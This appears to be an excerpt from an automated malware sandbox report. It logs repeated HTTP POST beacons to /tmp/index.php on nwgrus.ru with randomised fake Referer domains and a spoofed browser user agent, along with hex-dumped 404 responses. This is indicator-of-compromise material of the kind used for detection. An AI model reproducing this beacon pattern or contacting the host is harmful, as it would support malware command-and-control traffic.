Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rpyskssnoppwv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 290Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uspdxnihexd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 202Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fljiwnmgncpvmdu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hbbbwgrmtjdu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yhuliplstnjp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hiodckefgdl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cttvtshacog.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://baalviblkbjsp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gwngaiusekur.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mxjrhmxwrwqyxs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fcwffmgjsqp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vthbbsgwufn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 132Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xohyaostsydxib.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wbpwgsalvbneixte.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pbysepknkik.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 136Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ijtbudkgjdatnpve.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rjwxfpemkdjwjc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hnrmgadlbbkwfam.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 184Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wdfbqkdpkrjmiy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 136Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://atckbbeeuxiymh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cijofmhyocrj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mvcnjjhpwrjug.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gjrfgywovwumgreo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://duklicrioxv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ukjjgoqtxsrmcmnl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kevwooyenkvj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 307Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kyqpufsslxgu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gtfiwdiocoxv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 132Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wtloyxdgfedr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 298Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jrasjcgaikr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wqumsknhwrx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uqdrqkhpcmcglann.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qxdbxtuaolo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nobwwkshognvggkp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gafhlilcplomq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mwqmbajulrg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wtfbpeudtpjocvd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lkewxsecdko.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sxnddulhpoyubn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://suevwuleoceiaguq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dyetfqbcutdwehk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: nwgrus.ru

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: nwgrus.ru

Source: unknown

HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://procusohdnplkcl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: nwgrus.ru

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:02:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 87 e9 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:02:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:02:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:02:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:02:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:02:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:02:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:02:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
